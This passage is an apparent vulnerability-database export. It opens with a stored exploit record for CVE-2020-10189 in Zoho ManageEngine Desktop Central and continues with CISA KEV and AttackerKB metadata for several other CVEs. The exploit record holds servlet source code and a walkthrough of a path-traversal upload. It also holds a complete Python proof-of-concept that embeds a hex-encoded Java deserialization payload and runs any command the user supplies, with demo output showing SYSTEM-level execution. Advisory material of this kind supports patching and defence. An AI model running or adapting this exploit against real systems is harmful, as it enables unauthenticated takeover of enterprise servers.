customerID = ((Long) deviceMap.get(\"CUSTOMER_ID\"));\n deviceName = ((String) deviceMap.get(\"MANAGEDDEVICEEXTN.NAME\"));\n domainName = ((String) deviceMap.get(\"DOMAIN_NETBIOS_NAME\"));\n resourceID = ((Long) deviceMap.get(\"RESOURCE_ID\"));\n platformType = ((Integer) deviceMap.get(\"PLATFORM_TYPE\"));\n } else {\n customerID = Long.valueOf(0L);\n deviceName = \"default\";\n domainName = \"default\";\n }\n String baseDir = System.getProperty(\"server.home\");\n\n deviceName = removeInvalidCharactersInFileName(deviceName);\n\n String localDirToStore = baseDir + File.separator + \"mdm-logs\" + File.separator + customerID\n + File.separator + deviceName + \"_\" + udid; // 3\n\n File file = new File(localDirToStore);\n if (!file.exists()) {\n file.mkdirs(); // 4\n }\n logger.log(Level.WARNING, \"absolute Dir {0} \", new Object[]{localDirToStore});\n\n fileName = fileName.toLowerCase();\n if ((fileName != null) && (FileUploadUtil.hasVulnerabilityInFileName(fileName, \"log|txt|zip|7z\"))) { // 5\n logger.log(Level.WARNING, \"MDMLogUploaderServlet : Going to reject the file upload {0}\", fileName);\n response.sendError(403, \"Request Refused\");\n return;\n }\n String absoluteFileName = localDirToStore + File.separator + fileName; // 6\n\n logger.log(Level.WARNING, \"absolute File Name {0} \", new Object[]{fileName});\n\n InputStream in = null;\n FileOutputStream fout = null;\n try {\n in = request.getInputStream(); // 7\n fout = new FileOutputStream(absoluteFileName); // 8\n\n byte[] bytes = new byte['\u2710'];\n int i;\n while ((i = in.read(bytes)) != -1) {\n fout.write(bytes, 0, i); // 9\n }\n fout.flush();\n } catch (Exception e1) {\n e1.printStackTrace();\n } finally {\n if (fout != null) {\n fout.close();\n }\n if (in != null) {\n in.close();\n }\n }\n SupportFileCreation supportFileCreation = SupportFileCreation.getInstance();\n supportFileCreation.incrementMDMLogUploadCount();\n JSONObject deviceDetails = new JSONObject();\n deviceDetails.put(\"platformType\", 
platformType);\n deviceDetails.put(\"dataId\", resourceID);\n deviceDetails.put(\"dataValue\", deviceName);\n supportFileCreation.removeDeviceFromList(deviceDetails);\n } else {\n logger.log(Level.WARNING,\n \"MDMLogUploaderServlet : Going to reject the file upload as the file conentent lenght is {0}\",\n nDataLength);\n response.sendError(403, \"Request Refused\");\n return;\n }\n return;\n } catch (Exception e) {\n logger.log(Level.WARNING, \"Exception \", e);\n } finally {\n if (reader != null) {\n try {\n reader.close();\n } catch (Exception ex) {\n ex.fillInStackTrace();\n }\n }\n }\n }\n```\n\n```\n private static boolean isContainDirectoryTraversal(String fileName) {\n if ((fileName.contains(\"/\")) || (fileName.contains(\"\\\\\"))) {\n return true;\n }\n return false;\n }\n\n //...\n\n public static boolean hasVulnerabilityInFileName(String fileName, String allowedFileExt) {\n if ((isContainDirectoryTraversal(fileName)) || (isCompletePath(fileName))\n || (!isValidFileExtension(fileName, allowedFileExt))) {\n return true;\n }\n return false;\n }\n```\n\nWe can see that at [1] the `udid` variable is taken from the `udid` query-string parameter of a POST request. At [2] the `fileName` variable is taken from the query-string parameter `filename`. This `filename` parameter is filtered in two different ways for malicious values. At [3] a directory path is constructed from the `udid` value from [1], and at [4] a `mkdirs` primitive is hit. This is important because the `_chart` directory does not exist on the filesystem, and it must exist in order to exploit the deserialization bug. There is some validation on the `filename` at [5], which calls `FileUploadUtil.hasVulnerabilityInFileName` to check for directory traversals and an allow-list of extensions.\n\nOf course, this doesn't stop `udid` from containing directory traversals, but I digress. 
At [6] the `absoluteFileName` variable is built up from the attacker influenced path at [3] using the filename from [2] and at [7] the binary input stream is read from the attacker controlled POST body. Finally at [8] and [9] the file is opened and the contents of the request is written to disk. What is not apparent however, is that further validation is performed on the `filename` at [2]. Let's take one more look at the web.xml file:\n\n```config-filesecurity-regex.xml,security-mdm-regex.xml,security-mdm-api-regex.xml,security-properties.xml,security-common.xml,security-admin-sec-settings.xml,security-fws.xml,security-api.xml,security-patch-restapi.xml,security-mdm-groupdevices.xml,security-mdm-admin.xml,security-mdm-general.xml,security-mdm-agent.xml,security-mdm-reports.xml,security-mdm-inventory.xml,security-mdm-appmgmt.xml,security-mdm-docmgmt.xml,security-mdm-configuration.xml,security-defaultresponseheaders.xml,security-mdm-remote.xml,security-mdm-api-json.xml,security-mdm-api-get.xml,security-mdm-api-post.xml,security-mdm-api-put.xml,security-mdm-api-delete.xml,security-mdm-privacy.xml,security-mdm-osmgmt.xml,security-mdmapi-appmgmt.xml,security-mdmapi-profilejson.xml,security-mdmapi-profilemgmt.xml,security-mdm-compliance.xml,security-mdm-geofence.xml,security-mdmapi-sdp.xml,security-mdmp-CEA.xml,security-mdmapi-supporttab.xml,security-mdmapi-general.xml,security-mdm-roles.xml,security-mdm-technicians.xml,security-mdm-cea.xml,security-mdmapi-content-mgmt.xml,security-config.xml,security-patch.xml,security-patch-apd-scan.xml,security-patch-apd-scan-views.xml,security-patch-deployment.xml,security-patch-views.xml,security-patch-config.xml,security-patch-onpremise.xml,security-patch-server.xml,security-onpremise-common.xml,security-mdm-onpremise-files.xml,security-mdmapi-directory.xml,security-admin.xml,security-onpremise-admin.xml,security-reports.xml,security-inventory.xml,security-custom-fields.xml```\n\nThe file that stands out is the 
`security-mdm-agent.xml` config file. The corrosponding entry for the `MDMLogUploaderServlet` servlet looks like this:\n\n``````\n\nNote that the authentication attribute is ignored in this case. The `filename` GET parameter is restricted to the following strings: \"logger.txt\", \"logger.zip\", \"mdmlogs.zip\" and \"managedprofile_mdmlogs.zip\" using a regex pattern. For exploitation, this limitation doesn't matter since the deserialization bug permits a completely controlled filename.\n\n## Example:\n\nsaturn:~ mr_me$ ./poc.py \n(+) usage: ./poc.py(+) eg: ./poc.py 172.16.175.153 mspaint.exe\n\nsaturn:~ mr_me$ ./poc.py 172.16.175.153 \"cmd /c whoami > ../webapps/DesktopCentral/si.txt\"\n(+) planted our serialized payload\n(+) executed: cmd /c whoami > ../webapps/DesktopCentral/si.txt\n\nsaturn:~ mr_me$ curl http://172.16.175.153:8020/si.txt\nnt authority\\system\n\"\"\"\nimport os\nimport sys\nimport struct\nimport requests\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\nrequests.packages.urllib3.disable_warnings(InsecureRequestWarning)\n\ndef _get_payload(c):\n p = \"aced0005737200176a6176612e7574696c2e5072696f72697479517565756594\"\n p += \"da30b4fb3f82b103000249000473697a654c000a636f6d70617261746f727400\"\n p += \"164c6a6176612f7574696c2f436f6d70617261746f723b787000000002737200\"\n p += \"2b6f72672e6170616368652e636f6d6d6f6e732e6265616e7574696c732e4265\"\n p += \"616e436f6d70617261746f72cf8e0182fe4ef17e0200024c000a636f6d706172\"\n p += \"61746f7271007e00014c000870726f70657274797400124c6a6176612f6c616e\"\n p += \"672f537472696e673b78707372003f6f72672e6170616368652e636f6d6d6f6e\"\n p += \"732e636f6c6c656374696f6e732e636f6d70617261746f72732e436f6d706172\"\n p += \"61626c65436f6d70617261746f72fbf49925b86eb13702000078707400106f75\"\n p += \"7470757450726f706572746965737704000000037372003a636f6d2e73756e2e\"\n p += \"6f72672e6170616368652e78616c616e2e696e7465726e616c2e78736c74632e\"\n p += 
\"747261782e54656d706c61746573496d706c09574fc16eacab3303000649000d\"\n p += \"5f696e64656e744e756d62657249000e5f7472616e736c6574496e6465785b00\"\n p += \"0a5f62797465636f6465737400035b5b425b00065f636c6173737400125b4c6a\"\n p += \"6176612f6c616e672f436c6173733b4c00055f6e616d6571007e00044c00115f\"\n p += \"6f757470757450726f706572746965737400164c6a6176612f7574696c2f5072\"\n p += \"6f706572746965733b787000000000ffffffff757200035b5b424bfd19156767\"\n p += \"db37020000787000000002757200025b42acf317f8060854e002000078700000\"\n p += \"069bcafebabe0000003200390a00030022070037070025070026010010736572\"\n p += \"69616c56657273696f6e5549440100014a01000d436f6e7374616e7456616c75\"\n p += \"6505ad2093f391ddef3e0100063c696e69743e010003282956010004436f6465\"\n p += \"01000f4c696e654e756d6265725461626c650100124c6f63616c566172696162\"\n p += \"6c655461626c6501000474686973010013537475625472616e736c6574506179\"\n p += \"6c6f616401000c496e6e6572436c61737365730100354c79736f73657269616c\"\n p += \"2f7061796c6f6164732f7574696c2f4761646765747324537475625472616e73\"\n p += \"6c65745061796c6f61643b0100097472616e73666f726d010072284c636f6d2f\"\n p += \"73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f7873\"\n p += \"6c74632f444f4d3b5b4c636f6d2f73756e2f6f72672f6170616368652f786d6c\"\n p += \"2f696e7465726e616c2f73657269616c697a65722f53657269616c697a617469\"\n p += \"6f6e48616e646c65723b2956010008646f63756d656e7401002d4c636f6d2f73\"\n p += \"756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c\"\n p += \"74632f444f4d3b01000868616e646c6572730100425b4c636f6d2f73756e2f6f\"\n p += \"72672f6170616368652f786d6c2f696e7465726e616c2f73657269616c697a65\"\n p += \"722f53657269616c697a6174696f6e48616e646c65723b01000a457863657074\"\n p += \"696f6e730700270100a6284c636f6d2f73756e2f6f72672f6170616368652f78\"\n p += \"616c616e2f696e7465726e616c2f78736c74632f444f4d3b4c636f6d2f73756e\"\n p += \"2f6f72672f6170616368652f786d6c2f696e7465726e616c2f64746d2f44544d\"\n p += 
\"417869734974657261746f723b4c636f6d2f73756e2f6f72672f617061636865\"\n p += \"2f786d6c2f696e7465726e616c2f73657269616c697a65722f53657269616c69\"\n p += \"7a6174696f6e48616e646c65723b29560100086974657261746f720100354c63\"\n p += \"6f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f64\"\n p += \"746d2f44544d417869734974657261746f723b01000768616e646c6572010041\"\n p += \"4c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c\"\n p += \"2f73657269616c697a65722f53657269616c697a6174696f6e48616e646c6572\"\n p += \"3b01000a536f7572636546696c6501000c476164676574732e6a6176610c000a\"\n p += \"000b07002801003379736f73657269616c2f7061796c6f6164732f7574696c2f\"\n p += \"4761646765747324537475625472616e736c65745061796c6f6164010040636f\"\n p += \"6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f\"\n p += \"78736c74632f72756e74696d652f41627374726163745472616e736c65740100\"\n p += \"146a6176612f696f2f53657269616c697a61626c65010039636f6d2f73756e2f\"\n p += \"6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f\"\n p += \"5472616e736c6574457863657074696f6e01001f79736f73657269616c2f7061\"\n p += \"796c6f6164732f7574696c2f476164676574730100083c636c696e69743e0100\"\n p += \"116a6176612f6c616e672f52756e74696d6507002a01000a67657452756e7469\"\n p += \"6d6501001528294c6a6176612f6c616e672f52756e74696d653b0c002c002d0a\"\n p += \"002b002e01000708003001000465786563010027284c6a6176612f6c616e672f\"\n p += \"537472696e673b294c6a6176612f6c616e672f50726f636573733b0c00320033\"\n p += \"0a002b003401000d537461636b4d61705461626c6501001d79736f7365726961\"\n p += \"6c2f50776e6572373633323838353835323036303901001f4c79736f73657269\"\n p += \"616c2f50776e657237363332383835383532303630393b002100020003000100\"\n p += \"040001001a000500060001000700000002000800040001000a000b0001000c00\"\n p += \"00002f00010001000000052ab70001b100000002000d0000000600010000002e\"\n p += \"000e0000000c000100000005000f003800000001001300140002000c0000003f\"\n p += 
\"0000000300000001b100000002000d00000006000100000033000e0000002000\"\n p += \"0300000001000f00380000000000010015001600010000000100170018000200\"\n p += \"19000000040001001a00010013001b0002000c000000490000000400000001b1\"\n p += \"00000002000d00000006000100000037000e0000002a000400000001000f0038\"\n p += \"00000000000100150016000100000001001c001d000200000001001e001f0003\"\n p += \"0019000000040001001a00080029000b0001000c00000024000300020000000f\"\n p += \"a70003014cb8002f1231b6003557b10000000100360000000300010300020020\"\n p += \"00000002002100110000000a000100020023001000097571007e0010000001d4\"\n p += \"cafebabe00000032001b0a000300150700170700180700190100107365726961\"\n p += \"6c56657273696f6e5549440100014a01000d436f6e7374616e7456616c756505\"\n p += \"71e669ee3c6d47180100063c696e69743e010003282956010004436f64650100\"\n p += \"0f4c696e654e756d6265725461626c650100124c6f63616c5661726961626c65\"\n p += \"5461626c6501000474686973010003466f6f01000c496e6e6572436c61737365\"\n p += \"730100254c79736f73657269616c2f7061796c6f6164732f7574696c2f476164\"\n p += \"6765747324466f6f3b01000a536f7572636546696c6501000c47616467657473\"\n p += \"2e6a6176610c000a000b07001a01002379736f73657269616c2f7061796c6f61\"\n p += \"64732f7574696c2f4761646765747324466f6f0100106a6176612f6c616e672f\"\n p += \"4f626a6563740100146a6176612f696f2f53657269616c697a61626c6501001f\"\n p += \"79736f73657269616c2f7061796c6f6164732f7574696c2f4761646765747300\"\n p += \"2100020003000100040001001a00050006000100070000000200080001000100\"\n p += \"0a000b0001000c0000002f00010001000000052ab70001b100000002000d0000\"\n p += \"000600010000003b000e0000000c000100000005000f00120000000200130000\"\n p += \"0002001400110000000a000100020016001000097074000450776e7270770100\"\n p += \"7871007e000d78\"\n obj = bytearray(bytes.fromhex(p))\n obj[0x240:0x242] = struct.pack(\">H\", len(c) + 0x694)\n obj[0x6e5:0x6e7] = struct.pack(\">H\", len(c))\n start = obj[:0x6e7]\n end = obj[0x6e7:]\n return start + str.encode(c) + end\n\ndef 
we_can_plant_serialized(t, c):\n # stage 1 - traversal file write primitive\n uri = \"https://%s:8383/mdm/client/v1/mdmLogUploader\" % t\n p = {\n \"udid\" : \"si\\\\..\\\\..\\\\..\\\\webapps\\\\DesktopCentral\\\\_chart\",\n \"filename\" : \"logger.zip\"\n }\n h = { \"Content-Type\" : \"application/octet-stream\" }\n d = _get_payload(c)\n r = requests.post(uri, params=p, data=d, verify=False)\n if r.status_code == 200:\n return True\n return False\n\ndef we_can_execute_cmd(t):\n # stage 2 - deserialization\n uri = \"https://%s:8383/cewolf/\" % t\n p = { \"img\" : \"\\\\logger.zip\" }\n r = requests.get(uri, params=p, verify=False)\n if r.status_code == 200:\n return True\n return False\n\ndef main():\n if len(sys.argv) != 3:\n print(\"(+) usage: %s\" % sys.argv[0])\n print(\"(+) eg: %s 172.16.175.153 mspaint.exe\" % sys.argv[0])\n sys.exit(1)\n t = sys.argv[1]\n c = sys.argv[2]\n if we_can_plant_serialized(t, c):\n print(\"(+) planted our serialized payload\")\n if we_can_execute_cmd(t):\n print(\"(+) executed: %s\" % c)\n\nif __name__ == \"__main__\":\n main()", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://srcincite.io/pocs/src-2020-0011.py.txt"}], "cisa_kev": [{"lastseen": "2022-08-10T17:26:47", "description": "Zoho ManageEngine Desktop Central before 10.0.474 allows remote code execution because of deserialization of untrusted data in getChartImage in the FileStorage class. 
This is related to the CewolfServlet and MDMLogUploaderServlet servlets.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Zoho ManageEngine Desktop Central Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-10189"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2020-10189", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-10T17:26:47", "description": "Allows remote attackers to achieve path traversal and remote code execution on a Confluence Server or Data Center instance via server-side template injection.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": 
"2021-11-03T00:00:00", "type": "cisa_kev", "title": "Remote code execution via Widget Connector macro Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-3396"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2019-3396", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-10T17:26:47", "description": "A vulnerability in the web-based management interface of Cisco Small Business RV320 and RV325 Dual Gigabit WAN VPN Routers could allow an unauthenticated, remote attacker to retrieve sensitive information. The vulnerability is due to improper access controls for URLs. An attacker could exploit this vulnerability by connecting to an affected device via HTTP or HTTPS and requesting specific URLs. 
A successful exploit could allow the attacker to download the router configuration or detailed diagnostic information.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Cisco RV320 and RV325 Routers Improper Access Control Vulnerability (COVID-19-CTI list)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-1653"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2019-1653", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-08-10T17:26:47", "description": "Issue in Citrix Application Delivery Controller (ADC) and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0 allowing Directory Traversal.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, 
"published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Citrix Application Delivery Controller and Citrix Gateway Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2019-19781", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-10T17:26:47", "description": "A vulnerability in the web-based management interface of Cisco Small Business RV320 and RV325 Dual Gigabit WAN VPN Routers could allow an authenticated, remote attacker with administrative privileges on an affected device to execute arbitrary commands.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-03T00:00:00", "type": "cisa_kev", "title": "Cisco Small Business Routers Improper Input Validation Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", 
"integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-1652"], "modified": "2022-03-03T00:00:00", "id": "CISA-KEV-CVE-2019-1652", "href": "", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "attackerkb": [{"lastseen": "2022-07-10T23:05:21", "description": "Zoho ManageEngine Desktop Central before 10.0.474 allows remote code execution because of deserialization of untrusted data in getChartImage in the FileStorage class. This is related to the CewolfServlet and MDMLogUploaderServlet servlets.\n\n \n**Recent assessments:** \n \n**J3rryBl4nks** at March 13, 2020 9:41pm UTC reported:\n\nDue to this being an unauthenticated serialization exploit, the bar for exploitation is very low. Serialization is rampant in software, and most companies aren\u2019t doing it correctly.\n\nIt\u2019s relatively easy these days to exploit serialization vulnerabilities with ysoserial/ysoserial.net and it will be a problem for years going forward.\n\n**wvu-r7** at March 10, 2020 6:38pm UTC reported:\n\nDue to this being an unauthenticated serialization exploit, the bar for exploitation is very low. 
Serialization is rampant in software, and most companies aren\u2019t doing it correctly.\n\nIt\u2019s relatively easy these days to exploit serialization vulnerabilities with ysoserial/ysoserial.net and it will be a problem for years going forward.\n\nAssessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-03-06T00:00:00", "type": "attackerkb", "title": "CVE-2020-10189", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-10189"], "modified": "2021-07-27T00:00:00", "id": "AKB:86915DE7-C5F7-483B-A324-DF5B1929FBF6", "href": "https://attackerkb.com/topics/PyNCrvKjzq/cve-2020-10189", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-20T20:13:38", "description": "The Widget Connector macro in Atlassian Confluence Server before version 6.6.12 (the fixed version for 6.6.x), from version 6.7.0 before 6.12.3 (the fixed version for 6.12.x), from version 6.13.0 before 6.13.3 (the fixed version for 6.13.x), and from version 6.14.0 before 6.14.2 (the fixed version for 6.14.x), allows 
remote attackers to achieve path traversal and remote code execution on a Confluence Server or Data Center instance via server-side template injection.\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at October 20, 2020 6:54pm UTC reported:\n\nThis is now supposedly being exploited in the wild by Chinese state actors according to this NSA announcement: <https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF>\n\nAssessed Attacker Value: 0\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-10-30T00:00:00", "type": "attackerkb", "title": "CVE-2019-3396", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-3396"], "modified": "2019-10-30T00:00:00", "id": "AKB:BFDD9A54-15E2-4C3F-A140-DA45C72DACDA", "href": "https://attackerkb.com/topics/8PZOMRtIAA/cve-2019-3396", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-26T13:47:28", "description": "The Widget Connector macro in Atlassian Confluence Server before version 6.6.12 (the fixed 
version for 6.6.x), from version 6.7.0 before 6.12.3 (the fixed version for 6.12.x), from version 6.13.0 before 6.13.3 (the fixed version for 6.13.x), and from version 6.14.0 before 6.14.2 (the fixed version for 6.14.x), allows remote attackers to achieve path traversal and remote code execution on a Confluence Server or Data Center instance via server-side template injection.\n\n \n**Recent assessments:** \n \n**J3rryBl4nks** at March 03, 2020 3:30pm UTC reported:\n\nDue to many enterprise environments using Confluence, and many of them exposing it to the internet, this vulnerability is incredibly useful.\n\nThere is a public POC available: <https://github.com/Yt1g3r/CVE-2019-3396_EXP> from which you could base other attacks.\n\n**space-r7** at May 22, 2019 1:34pm UTC reported:\n\nDue to many enterprise environments using Confluence, and many of them exposing it to the internet, this vulnerability is incredibly useful.\n\nThere is a public POC available: <https://github.com/Yt1g3r/CVE-2019-3396_EXP> from which you could base other attacks.\n\n**asoto-r7** at May 09, 2019 5:57pm UTC reported:\n\nDue to many enterprise environments using Confluence, and many of them exposing it to the internet, this vulnerability is incredibly useful.\n\nThere is a public POC available: <https://github.com/Yt1g3r/CVE-2019-3396_EXP> from which you could base other attacks.\n\nAssessed Attacker Value: 4\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-03-25T00:00:00", "type": "attackerkb", "title": "Confluence Unauthorized RCE Vulnerability", 
